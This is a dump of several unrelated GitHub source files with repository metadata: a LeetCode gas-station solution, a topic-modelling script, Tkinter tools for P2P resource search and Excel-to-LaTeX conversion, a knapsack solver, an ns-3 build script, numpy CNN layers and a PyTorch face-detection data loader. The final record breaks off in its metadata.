20d3d2630c7722694a7e49fd13bcf76f6e1258f1 | 79d9719097b479504c0ed814ae1e13a3c466d2d8 | /arrays/general/gas_station.py | 9e17a4a334bbd25fdb3f0993b328a80708a699a7 | [] | no_license | ErickMwazonga/sifu | 70ca45e173c0b9e45e547c9d210fe54df0e9ac51 | 9cc461c6f0183837620c8b2bb02a658771f77e13 | refs/heads/master | 2023-09-01T03:20:19.667944 | 2023-08-31T11:08:20 | 2023-08-31T11:08:20 | 243,814,515 | 34 | 10 | null | null | null | null | UTF-8 | Python | false | false | 1,477 | py | '''
134. Gas Station
Link: https://leetcode.com/problems/gas-station/
There are n gas stations along a circular route, where the amount of gas at the ith station is gas[i].
You have a car with an unlimited gas tank and it costs cost[i] of gas to travel from the ith station to its next (i + 1)th station.
You begin the journey with an empty tank at one of the gas stations.
Given two integer arrays gas and cost, return the starting gas station's index
if you can travel around the circuit once in the clockwise direction, otherwise return -1.
If there exists a solution, it is guaranteed to be unique
Example:
Input: gas = [1, 2, 3, 4, 5], cost = [3, 4, 5, 1, 2]
Output: 3
Explanation:
Start at station 3 (index 3) and fill up with 4 unit of gas. Your tank = 0 + 4 = 4
Travel to station 4. Your tank = 4 - 1 + 5 = 8
Travel to station 0. Your tank = 8 - 2 + 1 = 7
Travel to station 1. Your tank = 7 - 3 + 2 = 6
Travel to station 2. Your tank = 6 - 4 + 3 = 5
Travel to station 3. The cost is 5. Your gas is just enough to travel back to station 3.
Therefore, return 3 as the starting index.
'''
def can_complete_circuit(self, gas, cost):
n = len(gas)
for s in range(n):
tank = 0
possible = True
for i in range(s, n + s):
station = i % n
tank += gas[station] - cost[station]
if tank < 0:
possible = False
break
if possible:
return s
return -1
| [
"emwazonga@microsoft.com"
] | emwazonga@microsoft.com |
59ace92504ab327c25eabe6c70872dbd2485e32e | e1228380bdebcb3cfab514d3b556ac97a424584e | /venv/bin/jupyter-run | db2bc5800da3c1752288e5b6fbc93e190d6ab7ff | [] | no_license | naveenkunareddy/financethroughpython | 62b7f6c1467fece9e245f9f7c0de20d6e9246807 | f55b388932a46e282841745517905ae1c3629720 | refs/heads/master | 2020-03-20T00:53:21.101294 | 2017-12-12T10:17:18 | 2017-12-12T10:17:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | #!/Users/dsr/Documents/HustleProjects/financethroughpython/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.runapp import RunApp
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(RunApp.launch_instance())
| [
"dmitry@rastorguev.co.uk"
] | dmitry@rastorguev.co.uk | |
8f5b9e5815ed9447dbdc3839d88f9081a003ef60 | c462a452ecbb978683f9b55a7863f2ca99050426 | /model.py | 31823da86196d47d7c199cad4c6a55614ffacf8e | [] | no_license | mobileraj/topicModel | b3d1c026e715b6611bde6ab3436c9be0971424cd | 5ac4de351250ebc760a9c4b192eb46d3168b542d | refs/heads/master | 2021-01-10T06:07:14.064524 | 2016-01-01T00:30:07 | 2016-01-01T00:30:07 | 48,590,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from nltk.stem.porter import PorterStemmer
from gensim import corpora, models
import gensim
tokenizer = RegexpTokenizer(r'\w+')
en_stop = get_stop_words('en')
p_stemmer = PorterStemmer()
doc_set=[]
for i in range(1977,2015):
print 'on ',str(i)
with open('/home/raj/projects/topicModels/topics/'+str(i)+'.txt','r') as foo:
doc_set.append(foo.read().replace('\n',''))
texts = []
for i in doc_set:
raw = i.lower()
tokens = tokenizer.tokenize(raw)
stopped_tokens = [i for i in tokens if not i in en_stop]
texts.append(stopped_tokens)
dictionary = corpora.Dictionary(texts)
corpus = [dictionary.doc2bow(text) for text in texts]
ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=10, id2word = dictionary, passes=20)
| [
"schroskat@gmail.com"
] | schroskat@gmail.com |
cec0630d7b02e3552f90a1868e3f887d46ada32c | 141aa0e3cf759234fd3828d662b1de1cf3252c98 | /p2psercher.py | 96ac0e0d183e4d354e6a40ead7f20d70e6c47311 | [] | no_license | somnusx/p2psercher | dcf34288da1337a26d42f8d9b8821b503f2d1c5a | 80d13fcf6af6e8eeb2215374728993de7e23daeb | refs/heads/master | 2021-01-19T04:26:05.612008 | 2016-07-14T10:11:03 | 2016-07-14T10:11:03 | 63,325,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py | import re
import urllib.request
from tkinter import *
master = Tk()
e = Entry(master,width=80)
e.grid(row=0, column=1,padx=5,pady=5)
text = Text(master)
text.grid(row=1, column=1)
def so():
sou = urllib.request.quote(e.get())
url = "http://api-jp02.smartmiu.com:184/s.py/op_search?word="+sou
r = urllib.request.urlopen(url)
s = r.read().decode("UTF-8")
if s.find('<title>') == -1:
text.insert(INSERT,"对你不起客官没有找到您想要的资源")
a = re.findall(r"(?<=<title>).+?(?=</title>)",s)
b = re.findall(r"(?<=<url>).+?(?=</url>)",s)
c = re.findall(r"(?<=<size>).+?(?=</size>)",s)
length1 = len(a)*2
length2 = len(a)*3
r = 1
k = 2
for i in c:
if r<length1:
a.insert(r,i)
r+=2
for i in b:
if k<length2:
a.insert(k,i)
k+=3
for each in range(len(a)):
if each%3 == 0:
text.insert(INSERT, (a[each],a[each+1],"\n",a[each+2],"\n\n"))
#print(a[each],a[each+1],"\n",a[each+2],"\n")
Button(master, text="搜琐", width=5, command=so).grid(row=0, column=2, padx=5, pady=5)
mainloop()
##def show():
##
## print("作品")
##
##c1 = Checkbutton(master,text="成人模式",variable=show)
###c2 = Checkbutton(master, text="帅锅", variable=show)
##c1.grid(row=1,column=2)
###c2.grid(row=1)
| [
"noreply@github.com"
] | noreply@github.com |
dcb8b926b77f0f9e46e7d838300cd7968dd643ba | b8f0b01b2ccbffacb86122558bc6390b2551e83b | /interface.py | 49a02623e20f8218d293380ea9bd3bea95286b9c | [] | no_license | TyeYeah/LaTeXfromExcel | 47e1b88e0a186f100453c4376d1716871e0a0d5d | 782ef5fe741f57e5832464dd10e992ac585d785c | refs/heads/master | 2020-12-12T08:18:42.385056 | 2020-06-27T03:37:42 | 2020-06-27T03:37:42 | 234,088,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,009 | py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
from writeTable import *
from readTable import *
import tkinter as tk
from tkinter import filedialog, dialog, messagebox
import os
file_path = ''
def openfile():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
def outputCSV():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
writeCSV(file_path[0:-4] + '.csv', readCSV(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.csv')
print('write csv successfully')
elif filesuffix.lower() == '.xls':
try:
writeCSV(file_path[0:-4] + '.csv', read03xls(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.csv')
print('write csv successfully')
elif filesuffix.lower() == '.xlsx':
try:
writeCSV(file_path[0:-5] + '.csv', read07xlsx(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.csv')
print('write csv successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def outputXLSX():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
write07xlsx(file_path[0:-4] + '.xlsx', readCSV(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xlsx')
print('write xlsx successfully')
elif filesuffix.lower() == '.xls':
try:
write07xlsx(file_path[0:-4] + '.xlsx', read03xls(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xlsx')
print('write xlsx successfully')
elif filesuffix.lower() == '.xlsx':
try:
write07xlsx(file_path[0:-5] + '.xlsx', read07xlsx(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.xlsx')
print('write xlsx successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def outputXLS():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
write03xls(file_path[0:-4] + '.xls', readCSV(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xls')
print('write xls successfully')
elif filesuffix.lower() == '.xls':
try:
write03xls(file_path[0:-4] + '.xls', read03xls(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xls')
print('write xls successfully')
elif filesuffix.lower() == '.xlsx':
try:
write03xls(file_path[0:-5] + '.xls', read07xlsx(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.xls')
print('write xls successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def outputTEX():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
writeLaTeX(file_path[0:-4] + '.tex', readCSV(file_path), 1)
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.tex')
print('write tex successfully')
elif filesuffix.lower() == '.xls':
try:
writeLaTeX(file_path[0:-4] + '.tex', read03xls(file_path), 1)
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.tex')
print('write tex successfully')
elif filesuffix.lower() == '.xlsx':
try:
writeLaTeX(file_path[0:-5] + '.tex', read07xlsx(file_path), 1)
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.tex')
print('write tex successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def mainwindow():
def conversion():
window.destroy()
def backmain():
conversionwin.destroy()
mainwindow()
def nodelwin():
messagebox.showinfo('Tip', 'Press Back to Main to Quit')
return ''
global file_path
file_path = ''
conversionwin = tk.Tk()
conversionwin.title('File Format Conversion')
conversionwin.geometry('500x300')
# conversionwin.protocol("WM_DELETE_WINDOW", nodelwin)
banner = 'Source file should have suffix as csv, xls or xlsx'
txt = tk.Label(conversionwin, text=banner, font=('Arial', 12), width=50, height=4)
txt.pack()
print('Enter conversion')
savexlsbut = tk.Button(conversionwin, text='Convert to XLS', font=('Arial', 12), width=30, height=1,
command=outputXLS)
savexlsbut.pack()
savexlsxbut = tk.Button(conversionwin, text='Convert to XLSX', font=('Arial', 12), width=30, height=1,
command=outputXLSX)
savexlsxbut.pack()
savecsvbut = tk.Button(conversionwin, text='Convert to CSV', font=('Arial', 12), width=30, height=1,
command=outputCSV)
savecsvbut.pack()
savetexbut = tk.Button(conversionwin, text='Convert to TEX', font=('Arial', 12), width=30, height=1,
command=outputTEX)
savetexbut.pack()
backbut = tk.Button(conversionwin, text='Back to Main Menu', font=('Arial', 12), width=30, height=1,
command=backmain)
backbut.pack()
conversionwin.mainloop()
return ''
def outputint():
window.destroy()
def backmain():
outputwin.destroy()
mainwindow()
def nodelwin():
messagebox.showinfo('Tip', 'Press Back to Main to Quit')
return ''
def outputlatex():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
nonlocal text1
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
text1.delete('1.0', tk.END)
text1.insert('insert', writeLaTeX('./tmptex.tex', readCSV(file_path)))
except Exception as e:
text1.delete('1.0', tk.END)
text1.insert('insert', 'Error occurred when opening csv')
else:
print('read csv successfully')
elif filesuffix.lower() == '.xls':
try:
text1.delete('1.0', tk.END)
text1.insert('insert', writeLaTeX('./tmptex.tex', read03xls(file_path)))
except Exception as e:
text1.delete('1.0', tk.END)
text1.insert('insert', 'Error occurred when opening xls')
else:
print('read xls successfully')
elif filesuffix.lower() == '.xlsx':
try:
text1.delete('1.0', tk.END)
text1.insert('insert', writeLaTeX('./tmptex.tex', read07xlsx(file_path)))
except Exception as e:
text1.delete('1.0', tk.END)
text1.insert('insert', 'Error occurred when opening xlsx')
else:
print('read xlsx successfully')
else:
text1.delete('1.0', tk.END)
text1.insert('insert',
'Unsopported file suffix\nOnly ".xls", ".xlsx", ".csv" are permitted\n' + file_path)
os.remove('./tmptex.tex')
global file_path
file_path = ''
outputwin = tk.Tk()
outputwin.title('Output LaTeX Source')
outputwin.geometry('500x300')
# outputwin.protocol("WM_DELETE_WINDOW", nodelwin)
print('Enter outputfunc')
text1 = tk.Text(outputwin, width=50, height=10, bg='cyan', font=('Arial', 12))
text1.pack()
outbut = tk.Button(outputwin, text='Choose File (xls, xlsx, csv)', font=('Arial', 12), width=30, height=1,
command=outputlatex)
outbut.pack()
backbut = tk.Button(outputwin, text='Back to Main Menu', font=('Arial', 12), width=30, height=1,
command=backmain)
backbut.pack()
outputwin.mainloop()
window = tk.Tk()
window.title('LaTeXfromExcel') # set title
window.geometry('500x300') # set size
banner = 'Convert Excel Data to LaTeX Source'
txt = tk.Label(window, text=banner, font=('Arial', 12), width=30, height=6)
txt.pack()
conbut = tk.Button(window, text='File Format Conversion', font=('Arial', 12), width=30, height=1,
command=conversion)
conbut.pack()
outbut = tk.Button(window, text='Output LaTeX Source', font=('Arial', 12), width=30, height=1, command=outputint)
outbut.pack()
window.mainloop() # show window
if __name__ == '__main__':
mainwindow()
| [
"noreply@github.com"
] | noreply@github.com |
277e031bbe4eb0de0c787b793ee12b9c9d314013 | 554a9b8011f8379a3f66e8f99fab320d604241e2 | /2026_Arvore_de_Natal/2026.py | 9692ef9ee7fd039928d992f64342d3f06c002d90 | [] | no_license | estherhoffmann/URI | e0ada72d3d541e345a7e890f38045635f726747a | a8ac10c3e56b351392b468acd7a0de04dfe72559 | refs/heads/master | 2020-10-01T04:24:58.846666 | 2019-12-12T00:56:38 | 2019-12-12T00:56:38 | 227,454,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,740 | py | # Esther Calderan Hoffmann - RA: 743529
def prog_dinamica_mochila(num_itens, valor_itens, peso_itens, capacidade):
matriz_valores = [[0 for i in range(0, capacidade+1)] for j in range(0, num_itens+1)]
for i in range(1, num_itens+1): #acrescento um item de cada vez
for j in range(0, capacidade+1): #vou aumentando a capacidade
#então para cada aumento de 1 item, vejo se pega ele com todas as possibilidades de capacidade
if j < peso_itens[i-1]:
#se a capacidade for menor que o peso do item não faz
#sentido pega-lo
matriz_valores[i][j] = matriz_valores[i-1][j]
#print("não peguei:", matriz_valores[i][j])
else:
#caso contrário, veja se é melhor aquela capacidade sem o novo item
#ou nao
matriz_valores[i][j] = max(matriz_valores[i-1][j], matriz_valores[i-1][j - peso_itens[i-1]] + valor_itens[i-1])
#print("peguei:", matriz_valores[i][j])
return matriz_valores[num_itens][capacidade]
num_galhos = int(input())
for i in range(0, num_galhos):
num_pacotes = int(input())
qnt_enfeites = [None]*num_pacotes
peso_pacote = [None]*num_pacotes
capacidade_galho = int(input())
for j in range(0, num_pacotes):
qnt_enfeites[j], peso_pacote[j] = input().split()
qnt_enfeites = list(map(int, qnt_enfeites))
peso_pacote = list(map(int, peso_pacote))
num_total = prog_dinamica_mochila(num_pacotes, qnt_enfeites, peso_pacote, capacidade_galho)
num_pacotes = None
capacidade_galho = None
qnt_enfeites = []
peso_pacote = []
print("Galho " + str(i+1) + ":")
print("Numero total de enfeites:", num_total)
print()
| [
"esthercalderan@gmail.com"
] | esthercalderan@gmail.com |
5633baca639401d57b615c992bb2ac1c9d3b7b2f | bf509ac391016e3f0f70e52b7ade9cdead291ef4 | /zock/ns3-book/local/exp04/wscript | 7b2bb10f34d1fab9a57e4553e3994512103386a9 | [] | no_license | 8Uchi29/ns3 | 7360f44621f6924166aebf35bd76750948ac8430 | 7bb5e7805b2346c80fd5d854fb921cea784e9765 | refs/heads/master | 2016-08-04T20:12:36.157439 | 2015-02-01T05:11:57 | 2015-02-01T05:11:57 | 29,118,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | ## -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-
def build(bld):
obj = bld.create_ns3_program('exp04-TcpFlowMonitoring',
['core', 'point-to-point', 'point-to-point-layout', 'applications', 'internet', 'flow-monitor'])
obj.source = 'exp04-TcpFlowMonitoring.cc'
obj = bld.create_ns3_program('exp04-UdpFlowMonitoring',
['core', 'point-to-point', 'point-to-point-layout', 'applications', 'internet', 'flow-monitor'])
obj.source = 'exp04-UdpFlowMonitoring.cc'
| [
"ryo@crunchbang.(none)"
] | ryo@crunchbang.(none) | |
bcfcfae6effa7e2b3cfddb5ad1e2af7d4f40caa6 | 09d564aaab98f72dce6585e78a0642c9fe3539f4 | /日常练习/python_exercise_20181124.py | 77a1eb50c86981a2e63439c1aafb739e42afc032 | [] | no_license | everydayxy/xy_py | 4b983b4bccc843602f1ea0b1d5ea9576119604bf | 08b314e7ecb10e13394aa93b92084c53596834f3 | refs/heads/master | 2020-04-03T08:52:44.729729 | 2019-09-20T15:05:35 | 2019-09-20T15:05:35 | 134,683,779 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | # def aaa(n):
# count = len(str(n))
# w = 10 ** (count-1)
# for _ in range(count):
# print(n // w)
# n %= w
# w //= 10
#
# num = int(input('输入一个数字: '))
# aaa(num)
# #输入一个数字,打印最大值
# max1 = -100000000000000000000
# while True:
# try:
# num = int(input('请输入一个数字:'))
# if num > max1:
# max1 = num
# end = input('输入数字结束了吗??【y/n|Y/N】')
# if end == 'y' or end == 'Y':
# print('最大值为:', max1)
# break
# except ValueError:
# print('检测到非法字符,请重新输入')
# break
for i in range(1,10):
s = ''
for j in range(1,i+1):
s += '{}*{}={:<4}'.format(j,i,j*i)
print(s) | [
"everydayx@163.com"
] | everydayx@163.com |
c28b69ee8ef4c7d7151653ef49a31bbed3d90abb | 87fa4da0be382087b9c950f3a56c95e8401519df | /codes/layers.py | 2025a0998f1f28a6c288fd1a83c8a2d99af04d53 | [] | no_license | AmadeusChan/CNNOnMNIST | 713f10f97db99842f28d0315cb5c6d2d1c544581 | 0f9687336ac6f9f6af5b86f4a007ecf1c8a38de6 | refs/heads/master | 2021-05-08T01:29:05.781955 | 2017-10-25T13:02:07 | 2017-10-25T13:02:07 | 107,856,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,545 | py | import numpy as np
from functions import conv2d_forward, conv2d_backward, avgpool2d_forward, avgpool2d_backward
class Layer(object):
def __init__(self, name, trainable=False):
self.name = name
self.trainable = trainable
self._saved_tensor = None
def forward(self, input):
pass
def backward(self, grad_output):
pass
def update(self, config):
pass
def _saved_for_backward(self, tensor):
self._saved_tensor = tensor
class Relu(Layer):
def __init__(self, name):
super(Relu, self).__init__(name)
self.output = np.ndarray(1)
def forward(self, input):
self._saved_for_backward(input)
self.output = np.maximum(0, input)
return self.output
def backward(self, grad_output):
input = self._saved_tensor
return grad_output * (input > 0)
class Sigmoid(Layer):
def __init__(self, name):
super(Sigmoid, self).__init__(name)
def forward(self, input):
output = 1 / (1 + np.exp(-input))
self._saved_for_backward(output)
return output
def backward(self, grad_output):
output = self._saved_tensor
return grad_output * output * (1 - output)
class Linear(Layer):
def __init__(self, name, in_num, out_num, init_std):
super(Linear, self).__init__(name, trainable=True)
self.in_num = in_num
self.out_num = out_num
self.W = np.random.randn(in_num, out_num) * init_std
self.b = np.zeros(out_num)
self.grad_W = np.zeros((in_num, out_num))
self.grad_b = np.zeros(out_num)
self.diff_W = np.zeros((in_num, out_num))
self.diff_b = np.zeros(out_num)
def forward(self, input):
self._saved_for_backward(input)
output = np.dot(input, self.W) + self.b
return output
def backward(self, grad_output):
input = self._saved_tensor
self.grad_W = np.dot(input.T, grad_output)
self.grad_b = np.sum(grad_output, axis=0)
return np.dot(grad_output, self.W.T)
def update(self, config):
mm = config['momentum']
lr = config['learning_rate']
wd = config['weight_decay']
self.diff_W = mm * self.diff_W + (self.grad_W + wd * self.W)
self.W = self.W - lr * self.diff_W
self.diff_b = mm * self.diff_b + (self.grad_b + wd * self.b)
self.b = self.b - lr * self.diff_b
class Reshape(Layer):
def __init__(self, name, new_shape):
super(Reshape, self).__init__(name)
self.new_shape = new_shape
def forward(self, input):
self._saved_for_backward(input)
return input.reshape(*self.new_shape)
def backward(self, grad_output):
input = self._saved_tensor
return grad_output.reshape(*input.shape)
class Conv2D(Layer):
def __init__(self, name, in_channel, out_channel, kernel_size, pad, init_std):
super(Conv2D, self).__init__(name, trainable=True)
self.kernel_size = kernel_size
self.pad = pad
self.W = np.random.randn(out_channel, in_channel, kernel_size, kernel_size) * init_std
self.b = np.zeros(out_channel)
self.diff_W = np.zeros(self.W.shape)
self.diff_b = np.zeros(out_channel)
def forward(self, input):
self._saved_for_backward(input)
output = conv2d_forward(input, self.W, self.b, self.kernel_size, self.pad)
return output
def backward(self, grad_output):
input = self._saved_tensor
grad_input, self.grad_W, self.grad_b = conv2d_backward(input, grad_output, self.W, self.b, self.kernel_size, self.pad)
return grad_input
def update(self, config):
mm = config['momentum']
lr = config['learning_rate']
wd = config['weight_decay']
self.diff_W = mm * self.diff_W + (self.grad_W + wd * self.W)
self.W = self.W - lr * self.diff_W
self.diff_b = mm * self.diff_b + (self.grad_b + wd * self.b)
self.b = self.b - lr * self.diff_b
class AvgPool2D(Layer):
def __init__(self, name, kernel_size, pad):
super(AvgPool2D, self).__init__(name)
self.kernel_size = kernel_size
self.pad = pad
def forward(self, input):
self._saved_for_backward(input)
output = avgpool2d_forward(input, self.kernel_size, self.pad)
return output
def backward(self, grad_output):
input = self._saved_tensor
grad_input = avgpool2d_backward(input, grad_output, self.kernel_size, self.pad)
return grad_input
| [
"greenclouds@foxmail.com"
] | greenclouds@foxmail.com |
6cc1e406d5e8c860b574719a113a6b490feddbd8 | 68359ee23312e47f18399b3e95b9dc9bb02c1a51 | /utils/my_data_loader.py | e458fce94f553626d380abd0c62ca77fe43d6ecb | [] | no_license | RoyceMao/DSFD | 6504de2e47e263a5e93f4f8ef957a3059581a1c9 | 1c6584f87aa5371fff0b6af2d7ad5d01919810f1 | refs/heads/master | 2020-05-30T06:04:12.879937 | 2019-11-26T06:32:50 | 2019-11-26T06:32:50 | 189,571,395 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,612 | py | # -*- coding:utf-8 -*-
"""
File Name: my_data_loader.py
Description : 数据加载
Author : royce.mao
date: 2019/06/13
"""
import torch
import random
import traceback
import numpy as np
import skimage
import math
from PIL import Image
from skimage import io
from torch.utils.data import Dataset
from utils.augment import Augmentation
from utils.augmentation import data_aug
from utils.my_np_utils import clip_boxes
class WIDERFace(Dataset):
    """WIDER FACE-style face-detection dataset.

    Parses a plain-text annotation list (one image per line) and yields
    augmented (image_tensor, target) pairs, where ``target`` holds one row
    per face in ``(x1, y1, x2, y2, cls)`` order with coordinates
    normalized to [0, 1].
    """

    def __init__(self, gen_file, mode='train'):
        """
        :param gen_file: annotation list file produced by data preparation;
                         each line is ``path face_num`` followed by
                         ``face_num`` groups of ``x y w h cls``
        :param mode: ``'train'`` or ``'val'``; forwarded to ``data_aug`` to
                     select the augmentation policy
        """
        super(WIDERFace, self).__init__()
        self.mode = mode
        self.fnames = []   # image file paths
        self.gts = []      # per-image face boxes as [x1, y1, x2, y2]
        self.labels = []   # per-image face class labels
        self.to_aug = Augmentation(640)
        # Read line by line; after .split() the fields are
        # [path, face_num, x, y, w, h, cls, x, y, w, h, cls, ...]
        with open(gen_file) as f:
            lines = f.readlines()
        for line in lines:
            line = line.strip().split()
            face_num = int(line[1])
            gt = []
            label = []
            # Faces of a single image: collect box coordinates and labels.
            # Boxes are converted here from (x, y, w, h) to corner form.
            for i in range(face_num):
                x = float(line[2 + 5 * i])
                y = float(line[3 + 5 * i])
                w = float(line[4 + 5 * i])
                h = float(line[5 + 5 * i])
                cls = int(line[6 + 5 * i])
                gt.append([x, y, x + w - 1, y + h - 1])
                label.append(cls)
            # Keep only images that have at least one annotated face
            if len(gt) > 0:
                self.fnames.append(line[0])  # len = num_samples
                self.gts.append(gt)  # len = num_samples
                self.labels.append(label)  # len = num_samples
        # Total number of usable samples
        self.num_samples = len(self.fnames)

    def __getitem__(self, index):
        """
        Index-based sample loading for both training and validation.

        Keeps resampling a random index until augmentation yields an image
        that still contains at least one valid face box.

        :param index: sample index into ``self.fnames``
        :return: ``(image_tensor, target)`` where ``target`` is produced by
                 ``clip_boxes`` over the augmented ``(cls, x1, y1, x2, y2)``
                 rows (coordinates normalized to [0, 1])
        """
        while True:
            # Load the image at the given index
            image_path = self.fnames[index]
            # img = io.imread(image_path)
            # if img.ndim != 3:
            #     img = skimage.color.gray2rgb(img)
            # img_height, img_width, _ = img.shape
            img = Image.open(image_path)
            if img.mode == 'L':
                # Promote grayscale images to 3-channel RGB
                img = img.convert('RGB')
            img_width, img_height = img.size
            # Normalize the face box coordinates of this image to [0, 1]
            gt_box = np.array(self.gts[index])
            gt_box[:, 0] = gt_box[:, 0] / img_width
            gt_box[:, 1] = gt_box[:, 1] / img_height
            # NOTE(review): __init__ already stores x2 = x + w - 1 and
            # y2 = y + h - 1, yet these two lines add the (already
            # normalized) x1/y1 back in before dividing — this looks like a
            # leftover from an [x, y, w, h] box format; verify against the
            # annotation list format and data_aug's expectations.
            gt_box[:, 2] = (gt_box[:, 2] + gt_box[:, 0]) / img_width
            gt_box[:, 3] = (gt_box[:, 3] + gt_box[:, 1]) / img_height
            # Face class labels for this image
            gt_label = np.array(self.labels[index])
            # Concatenate and convert to a list of
            # [face_num, (cls, x1, y1, x2, y2)]
            gt_box_label = np.hstack((gt_label[:, np.newaxis], gt_box)).tolist()
            # Apply data augmentation; any failure falls through to the
            # except branch and resamples a different random index.
            try:
                img, sample_box_label = data_aug(img, gt_box_label, self.mode, image_path)
                # img, boxes, labels = self.to_aug(img, gt_box, gt_label)
                ## IMG channel-first layout
                # if len(img.shape) == 3:
                #     img = np.swapaxes(img, 1, 2)
                #     img = np.swapaxes(img, 1, 0)
                ## BOX coordinate normalization
                # boxes = boxes / 640
                # sample_box_label = np.hstack((labels[:, np.newaxis], boxes))
                # After augmentation, convert the labels from
                # [face_num, (cls, x1, y1, x2, y2)] to
                # [face_num, (x1, y1, x2, y2, cls)]
                if len(sample_box_label) > 0:
                    target = clip_boxes(sample_box_label, 1)
                    # target = np.hstack((sample_box_label[:, 1:], sample_box_label[:, 0][:, np.newaxis]))
                    # Sanity checks: boxes must have positive extent and
                    # both image and target must be finite.
                    assert (target[:, 2] > target[:, 0]).any()
                    assert (target[:, 3] > target[:, 1]).any()
                    assert not np.any(np.isnan(target))
                    assert not np.any(np.isnan(img))
                    assert not np.any(np.isinf(target))
                    assert not np.any(np.isinf(img))
                    break  # Accept (img, target) only when faces survive augmentation; otherwise keep resampling random indices
                else:
                    index = random.randrange(0, self.num_samples)
                    continue
            except Exception as e:
                traceback.print_exc()
                index = random.randrange(0, self.num_samples)
                continue
        # print(target)
        return torch.from_numpy(img), target

    def __len__(self):
        """Return the number of usable samples."""
        return self.num_samples
def face_collate(batch):
    """Collate fn for batches whose images carry varying box counts.

    Each element of *batch* is an ``(image_tensor, annotations)`` pair.
    Images are stacked along a new leading batch dimension; annotations
    stay a plain list of ``FloatTensor`` (one per image) because every
    image may contain a different number of faces.

    Arguments:
        batch: (tuple) A tuple of tensor images and lists of annotations
    Return:
        A tuple containing:
            1) (tensor) batch of images stacked on their 0 dim
            2) (list of tensors) per-image annotation tensors
    """
    images = [sample[0] for sample in batch]
    targets = [torch.FloatTensor(sample[1]) for sample in batch]
    return torch.stack(images, 0), targets
| [
"563422264@qq.com"
] | 563422264@qq.com |
10a39d56ddb328c6d322c5856d31a5d373aa2ed8 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_ConstantTrend_Seasonal_DayOfWeek_LSTM.py | d3d6f857ae0191e4610ab1abbda44e021c1aa868 | [
"BSD-3-Clause",
